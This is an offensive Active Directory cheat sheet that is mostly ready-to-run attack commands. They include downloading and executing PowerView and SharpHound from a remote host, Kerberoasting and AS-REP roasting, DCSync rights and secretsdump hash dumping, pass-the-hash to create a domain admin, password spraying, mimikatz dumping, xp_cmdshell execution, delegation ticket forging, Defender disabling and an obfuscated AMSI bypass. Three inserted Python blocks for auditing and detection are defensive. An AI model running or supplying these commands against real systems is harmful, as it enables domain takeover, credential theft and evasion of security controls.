Domain Enumeration + Exploitation
This is just a living document of things I have needed for domain enumeration/exploitation.

POWERSPLOIT

Use the dev branch of PowerSploit. For an already incredible cheat sheet, check out HarmJ0y's.
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')

Get Domain Users

Get-NetUser * -Domain corp.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset, lastlogontimestamp,accountexpires,admincount,userprincipalname, serviceprincipalname, mail,useraccountcontrol | Export-CSV users.csv

Get Domain Computers

Get-NetComputer * -Domain corp.local | Select-Object -Property dnshostname,operatingsystem,operatingsystemservicepack,lastlogontimestamp | Export-CSV computers.csv

Get Group Members

Get-DomainGroupMember -Identity "Helpdesk" | Select-Object membername

SPN Ticket Request (Kerberoast)

Get-DomainUser * -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Export-Csv .\ticket.csv -NoTypeInformation

Enumerate User DACLs

PS C:\> Get-DomainObjectAcl -Identity it_admin -ResolveGUIDs | ? { $_.SecurityIdentifier -Match $(ConvertTo-SID burmat) }
AceType : AccessAllowed
ObjectDN : CN=it_admin,CN=Users,DC=BURMAT,DC=CO
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2736429227-4547413232-2815246478-1130
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2736429227-4547413232-2815246478-1107
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

Enumerate Network Shares

## scan an entire domain:
find-domainshare -computerdomain burmat.local
## narrow down scope, check permissions:
find-domainshare -computername websrv.burmat.local -computerdomain burmat.local -CheckShareAccess

Impersonate Another Domain User

PS C:\> $cred = New-Object System.Management.Automation.PSCredential "BURMAT\John.Smith", $(ConvertTo-SecureString "Spring2020!" -AsPlainText -Force);
PS C:\> find-domainshare -computername fs01.burmat.local -Credential $cred -computerdomain burmat.local -CheckShareAccess
WARNING: [Invoke-UserImpersonation] Executing LogonUser() with user: BURMAT\John.Smith
WARNING: [Invoke-RevertToSelf] Reverting token impersonation and closing LogonUser() token handle
Name Type Remark ComputerName
---- ---- ------ ------------
Accounting 0 fs01.burmat.local
Private 0 fs01.burmat.local
PS C:\windows\temp\.b> Invoke-UserImpersonation -Credential $cred
WARNING: [Invoke-UserImpersonation] Executing LogonUser() with user: BURMAT\John.Smith
6548
## now we can read the directory impersonating another user if permissions exist:
PS C:\> dir \\fs01.burmat.local\Private

Enumerate GPOs

"{7EA15487-7F5B-4CE3-C029-CEBE6FFE6D47}" | Get-DomainGPO

Reset Domain User Password

If you have control over another AD user object (WriteOwner, WriteDACL, GenericWrite, Owner, etc.), you can reset its password with ease:
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
$user = 'DOMAIN\owner_acct';
$pass= ConvertTo-SecureString 'Password123!' -AsPlainText -Force;
$creds = New-Object System.Management.Automation.PSCredential $user, $pass;
$newpass = ConvertTo-SecureString '[email protected]' -AsPlainText -Force;
Set-DomainUserPassword -Identity 'DOMAIN\vuln_user' -AccountPassword $newpass -Credential $creds;
Or if you can set yourself as owner, the following will do:
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
Set-DomainObjectOwner -Identity it_admin -OwnerIdentity burmat
Add-DomainObjectAcl -TargetIdentity it_admin -PrincipalIdentity burmat
$newpass = ConvertTo-SecureString -String 'burmat123$' -AsPlainText -Force
Set-DomainUserPassword -Identity it_admin -AccountPassword $newpass

Add/Exploit DCSync Rights

Do you have WriteDACL to a domain? Give DCSync rights to an unprivileged domain user account:
Add-DomainObjectAcl -TargetIdentity "DC=burmatco,DC=local" -PrincipalIdentity useracct1 -Rights DCSync
And use these rights to dump the hashes from the domain:
meterpreter > dcsync_ntlm BURMATCO\\useracct1

IMPACKET

Thanks to the impacket toolset, exploiting misconfigurations in AD environments is made easier.

GetNPUsers.py

Attempt to get TGTs for users that have UF_DONT_REQUIRE_PREAUTH set:
python GetNPUsers.py -request -no-pass -dc-ip 10.10.10.123 burmat.co/ -usersfile users.txt

secretsdump.py

Attack a local offline copy of NTDS.dit:
./secretsdump.py -ntds /root/l00t/ntds.dit -system /root/l00t/systemhive LOCAL
Or you can attack a system remotely:
./secretsdump.py -just-dc-ntlm burmat.co/[email protected]

GetADUsers.py

Leverage this script to grab usernames via LDAP:
./GetADUsers.py -all -no-pass -dc-ip 10.10.10.123 burmat.co/ | cut -d " " -f 1 | grep -Ev 'Name|Impacket|\-\-|\[' >> users.txt

CRACKMAPEXEC

Pass-the-Hash

Because hashes are just as good:
## create a new user
crackmapexec smb 10.10.10.123 -u 'administrator' -d 'burmat.co' -H 'd7452863d1e8e15241nn50ceb1ab9dfe' -x 'net user burmat Pwn3dPwn3d! /add /domain'
## add user to domain admins group
crackmapexec smb 10.10.10.123 -u 'administrator' -d 'burmat.co' -H 'd7452863d1e8e15241nn50ceb1ab9dfe' -x 'net group "Domain Admins" /add burmat /domain'

Password Spraying

Switch out usernames/passwords/targets with lists:
## to spray that Spring2020! and a list of users against a list of targets:
crackmapexec smb ~/targets.txt -u ~/users.txt -p Spring2020! -d burmat.co

Dumping Credentials

## mimikatz module
crackmapexec smb 10.10.10.123 -u 'administrator' -d 'burmat.co' -p 'S3cur3PW123' -M mimikatz -o COMMAND='privilege::debug'
## SAM database
crackmapexec smb 10.10.10.123 -u 'administrator' -d 'burmat.co' -p 'S3cur3PW123' --sam

POWERUPSQL

MSSQL Enumeration:

## basic instance information
Get-SQLInstanceLocal
## more verbose information:
Get-SQLServerInfo -Verbose -Instance SQLSRV\SQLEXPRESS
## crawl for database links:
Get-SqlServerLinkCrawl -Verbose -Instance SQLSRV\SQLEXPRESS
Get-SqlServerLinkCrawl -Verbose -Instance SQLSRV\SQLEXPRESS -Query "select name from master..sysdatabases" | Select-Object -ExpandProperty CustomQuery

Enable xp_cmdshell / Execute Commands

## enable xp_cmdshell:
Get-SQLQuery -Instance SQLSRV\SQLEXPRESS -query "EXECUTE('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT ""sqlsrv.burmat.local"""
## test rce:
Get-SQLServerLinkCrawl -Instance "SQLSRV\SQLEXPRESS" -Query "exec master..xp_cmdshell 'whoami'" | Select-Object -ExpandProperty CustomQuery

KERBEROS

Brute Usernames with Nmap

nmap -v -Pn -p 88 --script krb5-enum-users.nse --script-args "realm='burmat.co', userdb='users.txt'" 10.10.10.123

GenericWrite to Host + User SPN = PWN

If we have GenericWrite over a host's computer object and control a user that has an SPN, we can write that user's SID into the host's msDS-AllowedToActOnBehalfOfOtherIdentity attribute and forge tickets as anyone we like. You can read more about it here: https://alsid.com/company/news/kerberos-resource-based-constrained-delegation-new-control-path
## we can write the delegation attribute on the host's computer object (through the DC) with the following:
$UserSid = Get-DomainUser svc_burmat -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($UserSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer websrv.burmat.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
## now we can use rubeus to forge tickets as anyone we want:
./rubeus.exe s4u /user:svc_burmat /ticket:doIFFDCCBRCg... SNIP .. /impersonateuser:administrator /msdsspn:cifs/websrv.burmat.local /ptt
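The DACL grant in the DCSync section above and the msDS-AllowedToActOnBehalfOfOtherIdentity descriptor built just above are both plain security descriptors, so a defender can audit them the same way. The following is an added example, not code from this cheat sheet, PowerView or Rubeus: it parses the SDDL string form of a descriptor (the binary attribute value is assumed to have been converted first with RawSecurityDescriptor.GetSddlForm) and lists which SIDs may delegate to a host and which hold the two replication extended rights that DCSync needs; the function names and the sample descriptors with their SIDs are constructed.

```python
import re

# Added audit helper, not code from the cheat sheet, PowerView or Rubeus. It parses
# the SDDL string form of an AD security descriptor (binary values such as the
# msDS-AllowedToActOnBehalfOfOtherIdentity blob above are assumed converted first
# with RawSecurityDescriptor.GetSddlForm) to list who may delegate to a host and
# who holds the two replication rights that make DCSync possible.
ACE_RE = re.compile(r"\(([^)]*)\)")
RIGHTS = {"CC": "CreateChild", "DC": "DeleteChild", "LC": "ListChildren", "SW": "Self",
          "RP": "ReadProperty", "WP": "WriteProperty", "DT": "DeleteTree", "LO": "ListObject",
          "CR": "ExtendedRight", "SD": "Delete", "RC": "ReadControl", "WD": "WriteDacl",
          "WO": "WriteOwner", "GA": "GenericAll", "GR": "GenericRead", "GW": "GenericWrite"}
# Extended-right GUIDs that "-Rights DCSync" grants (well-known AD schema values).
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

def parse_rights(r: str) -> list[str]:
    if r.startswith("0x"):          # numeric access mask, kept verbatim
        return [r]
    return [RIGHTS.get(r[i:i + 2], r[i:i + 2]) for i in range(0, len(r), 2)]

def parse_sddl(sddl: str) -> dict:
    """Owner token plus each DACL ACE as type/flags/rights/object_type/sid."""
    owner = re.search(r"O:(.*?)(?=G:|D:|S:|$)", sddl)
    dacl = re.search(r"D:(.*?)(?=S:|$)", sddl)
    aces = []
    for body in ACE_RE.findall(dacl.group(1) if dacl else ""):
        f = body.split(";")
        if len(f) >= 6:
            aces.append({"type": f[0], "flags": f[1], "rights": parse_rights(f[2]),
                         "object_type": f[3].lower(), "sid": f[5]})
    return {"owner": owner.group(1) if owner else None, "aces": aces}

def allowed_delegators(sddl: str) -> list[str]:
    """SIDs with an access-allowed ACE: each may impersonate users to this computer."""
    return [a["sid"] for a in parse_sddl(sddl)["aces"] if a["type"] in ("A", "OA")]

def dcsync_principals(sddl: str) -> list[str]:
    """SIDs granted both DS-Replication-Get-Changes and -Get-Changes-All."""
    held = {}
    for a in parse_sddl(sddl)["aces"]:
        if a["type"] == "OA" and "ExtendedRight" in a["rights"]:
            held.setdefault(a["sid"], set()).add(a["object_type"])
    return sorted(s for s, g in held.items() if {GET_CHANGES, GET_CHANGES_ALL} <= g)

# Constructed samples (made-up SIDs; the first mirrors the descriptor shape above).
RBCD_SDDL = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2736429227-4547413232-2815246478-1107)"
DOMAIN_SDDL = ("O:DAD:(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1-2-3-1105)"
               "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1-2-3-1105)"
               "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1-2-3-1106)")
```

Any SID returned by allowed_delegators on a computer object, or by dcsync_principals on the domain head, that is not a domain controller or an approved service account is a finding worth investigating.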

Kerberoasting:

Rubeus:

./rubeus.exe kerberoast /creduser:burmat.co\xsvc /credpassword:S3cur3PW123 /outfile:user.hash

Impacket:

./GetUserSPNs.py -request -dc-ip 10.10.10.123 burmat.co/xsvc:S3cur3PW123
hashcat -m 13100 hash.txt -a 0 /usr/share/wordlists/rockyou.txt --force

PowerView:

IEX(New-Object Net.WebClient).downloadString('http://10.10.15.123/ps/PowerView.ps1');
$securePassword = ConvertTo-SecureString 'S3cur3PW123' -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential('burmat.co\xsvc', $securePassword);
Get-DomainUser -Credential $credential -Server dc01.burmat.co -SPN | Get-DomainSPNTicket -Credential $credential -OutputFormat Hashcat
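Every Kerberoasting variant above (the PowerSploit SPN ticket request, Rubeus, GetUserSPNs.py, PowerView) leaves the same trace on the DC: one account requesting RC4-HMAC (etype 0x17, the TGS-REP type hashcat mode 13100 cracks) service tickets for many distinct service accounts in a short burst. The following is an added detection example, not code from the cheat sheet or any tool it names; the 4769 field names follow the Windows Security EventData schema, while the sample events, threshold and window are constructed.

```python
from collections import defaultdict

# Added detection sketch (not from the cheat sheet or any tool it names). It scores
# Security log 4769 events: one account requesting RC4-HMAC (etype 0x17) service
# tickets for several distinct user SPNs inside a short window is the footprint
# of Kerberoasting as run above. Computer accounts (names ending in $) and
# krbtgt are excluded because normal logons also request those tickets.
RC4_HMAC = "0x17"

def is_roast_shaped(ev: dict) -> bool:
    """RC4 ticket, successfully issued, for a non-krbtgt, non-computer service."""
    svc = ev["ServiceName"].lower()
    return (ev["TicketEncryptionType"].lower() == RC4_HMAC
            and ev["Status"] == "0x0"
            and svc != "krbtgt" and not svc.endswith("$"))

def kerberoast_candidates(events, threshold=5, window=300):
    """Requester -> sorted distinct services, when at least `threshold` distinct
    RC4 service tickets were requested within `window` seconds."""
    per_user = defaultdict(list)
    for ev in events:
        if is_roast_shaped(ev):
            per_user[ev["TargetUserName"].lower()].append((ev["TimeCreated"], ev["ServiceName"]))
    hits = {}
    for user, reqs in per_user.items():
        reqs.sort()                       # by TimeCreated, then service name
        for i, (t0, _) in enumerate(reqs):
            burst = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(burst) >= threshold:
                hits[user] = sorted(burst)
                break
    return hits

# Constructed sample events (field names follow 4769 EventData; values made up).
def ev(t, user, svc, etype, status="0x0"):
    return {"TimeCreated": t, "TargetUserName": user, "ServiceName": svc,
            "TicketEncryptionType": etype, "Status": status}

SAMPLE_4769 = [
    ev(0, "xsvc@BURMAT.CO", "svc_sql", "0x17"), ev(3, "xsvc@BURMAT.CO", "svc_web", "0x17"),
    ev(5, "xsvc@BURMAT.CO", "svc_backup", "0x17"), ev(9, "xsvc@BURMAT.CO", "svc_iis", "0x17"),
    ev(12, "xsvc@BURMAT.CO", "svc_sccm", "0x17"), ev(20, "xsvc@BURMAT.CO", "WEBSRV$", "0x17"),
    ev(30, "jsmith@BURMAT.CO", "svc_sql", "0x12"), ev(40, "jsmith@BURMAT.CO", "WEBSRV$", "0x12"),
    ev(900, "xsvc@BURMAT.CO", "svc_print", "0x17"),
]
```

Tune the threshold to the environment; the durable mitigation is AES-only service accounts and long random passwords, since the cracking step in hashcat above only works against RC4 tickets of weak passwords.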

Attacking spoolss ("The Printer Bug")

From a host with unconstrained delegation, "the printer bug" and dementor.py can be used to cause a TGT relay from the target host to us running responder, so we can generate a TGS for any user on that target host:
## set up a relay with responder:
responder -I tun0 --lm # tun0 = 10.10.15.123
## execute exploit through:
proxychains python dementor.py -u xsvc -p 'S3cur3PW123' -d 'burmat.co' 10.10.15.123 10.10.10.123

BLOODHOUND

Ingestor Launch

IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.123/ps/SharpHound.ps1');
Invoke-BloodHound -CollectionMethod All -CompressData -SkipPing;

LDAP QUERIES

Below are some useful LDAP queries that will help you enumerate a system. Some of them require a valid username/password to get more information. My go-to for these queries is ldapsearch.
Null session:
ldapsearch -x -h 10.10.10.123 -D '' -w '' -b "DC=BURMAT,DC=CO"
Authenticated:
ldapsearch -LLL -x -H ldap://burmat.co -D "svc-burmat" -w "burmat123$" -b "dc=burmat,dc=co" "<LDAP QUERY HERE>"

Domain Usernames

Get usernames into a list by enumerating user objects:
ldapsearch -x -h burmat.co -b "dc=burmat,dc=co" -s sub "(objectclass=user)" | grep sAMAccountName | cut -d " " -f 2 > users.txt

ASREPRoast Accounts

## ldap filter to find accounts susceptible to this:
"(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
## generate a list of user accounts and use impacket to exploit:
python GetNPUsers.py -request -no-pass -dc-ip 10.1.1.123 burmat.co/ -usersfile users.txt
## and if you get a ticket, you can crack it:
hashcat -m 18200 -a 0 --force user.hash /usr/share/wordlists/rockyou.txt

User Account Objects with SPNs

"(&(&(servicePrincipalName=*) (UserAccountControl:1.2.840.113556.1.4.803:=512)) (!(UserAccountControl:1.2.840.113556.1.4.803:=2)))"
## if you get valid domain credentials, you can dump them w/ impacket for offline cracking:
python GetUserSPNs.py -request burmat.co/svc-burmat:burmat123$

User and Computers with Unconstrained Delegation

# user:
"(&(&(objectCategory=person) (objectClass=user)) (userAccountControl:1.2.840.113556.1.4.803:=524288))"
# computer:
"(&(objectCategory=computer) (objectClass=computer) (userAccountControl:1.2.840.113556.1.4.803:=524288))"
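The three filters above (ASREPRoast, SPN accounts, unconstrained delegation) all hinge on the bitwise-AND matching rule 1.2.840.113556.1.4.803 over userAccountControl. The following is an added audit example, not part of the cheat sheet: it re-implements the same filter logic in Python so the bit masks can be checked and run against an exported account list; the function names and the sample records are constructed.

```python
# Added audit helper, not code from the cheat sheet. It reproduces the three LDAP
# bit filters above in Python: the matching rule 1.2.840.113556.1.4.803
# (LDAP_MATCHING_RULE_BIT_AND) matches when (userAccountControl & mask) == mask.
ACCOUNTDISABLE = 0x2
NORMAL_ACCOUNT = 0x200               # 512
TRUSTED_FOR_DELEGATION = 0x80000     # 524288, unconstrained delegation
DONT_REQ_PREAUTH = 0x400000          # 4194304, AS-REP roastable
SAM_NORMAL_USER_ACCOUNT = 805306368  # samAccountType of user objects

def bit_and(value: int, mask: int) -> bool:
    """Semantics of (userAccountControl:1.2.840.113556.1.4.803:=mask)."""
    return value & mask == mask

def asreproastable(acct: dict) -> bool:
    # (&(samAccountType=805306368)(userAccountControl:...:=4194304))
    return (acct["samAccountType"] == SAM_NORMAL_USER_ACCOUNT
            and bit_and(acct["userAccountControl"], DONT_REQ_PREAUTH))

def kerberoastable(acct: dict) -> bool:
    # (&(&(servicePrincipalName=*)(UAC:...:=512))(!(UAC:...:=2)))
    uac = acct["userAccountControl"]
    return bool(acct.get("servicePrincipalName")) and bit_and(uac, NORMAL_ACCOUNT) and not bit_and(uac, ACCOUNTDISABLE)

def unconstrained_delegation(acct: dict) -> bool:
    # (userAccountControl:...:=524288), same bit for user and computer objects
    return bit_and(acct["userAccountControl"], TRUSTED_FOR_DELEGATION)

def audit(accounts: list[dict]) -> dict[str, list[str]]:
    """sAMAccountName -> exposures, for every account matching at least one filter."""
    checks = [("asreproast", asreproastable), ("kerberoast", kerberoastable),
              ("unconstrained-delegation", unconstrained_delegation)]
    findings = {}
    for acct in accounts:
        hits = [label for label, check in checks if check(acct)]
        if hits:
            findings[acct["sAMAccountName"]] = hits
    return findings

# Constructed sample records (not real directory data).
def rec(name, sat, uac, spn=None):
    return {"sAMAccountName": name, "samAccountType": sat, "userAccountControl": uac, "servicePrincipalName": spn}

SAMPLE = [
    rec("svc_burmat", 805306368, NORMAL_ACCOUNT | DONT_REQ_PREAUTH, ["http/websrv"]),
    rec("old_svc", 805306368, NORMAL_ACCOUNT | ACCOUNTDISABLE, ["MSSQLSvc/sqlsrv"]),
    rec("WEBSRV$", 805306369, 0x1000 | TRUSTED_FOR_DELEGATION, ["HOST/websrv"]),
    rec("jsmith", 805306368, NORMAL_ACCOUNT),
]
```

Feed it the output of an LDAP export and every name it returns is an account the filters above would hand an attacker; the disabled old_svc correctly drops out, which is why the SPN filter negates bit 2.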

Domain Administrators

"(&(objectClass=user) (memberof:1.2.840.113556.1.4.1941:=CN=Domain Admins,CN=Users,DC=burmat,DC=co))"

Group Policies

"objectClass=groupPolicyContainer"

EVADING AV

Checking Status

# is av enabled:
PS C:\> Get-MpComputerStatus
# applocker rules:
PS C:\> $a = Get-ApplockerPolicy -effective
PS C:\> $a.rulecollections
# constrained?:
PS C:\> $ExecutionContext.SessionState.LanguageMode

PowerShell Bypass with 32-bit

PowerShell disabled for you? Try running the 32-bit copy of it:
C:\windows\syswow64\windowspowershell\v1.0\powershell whoami

Writable Folders for Bypassing Execution Control

Try putting your payload in one of the following directories:
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing

Turning Off Defender's RTM

PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus

AMSI Bypass

PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)

PROCESS ELEVATION (via SeDebugPrivilege)

If you run whoami /priv and you see SeDebugPrivilege set to Enabled, you can assume you already have SYSTEM.
One way of doing it is to use decoder's psgetsys.ps1 script once you have a good idea of a PID to inject into:
. .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(7864,'C:\temp\burmat443.exe');
You can also gain an MSF session and use the module windows/manage/payload_inject with a PID of your choice.

REMOTE DESKTOP

Enable RDP

PS C:\> Set-itemproperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -value 0
PS C:\> Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -value 1
PS C:\> Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

MISCELLANEOUS

# list shared folders
PS> Get-WmiObject -Class Win32_Share -Computer dc1.burmat.co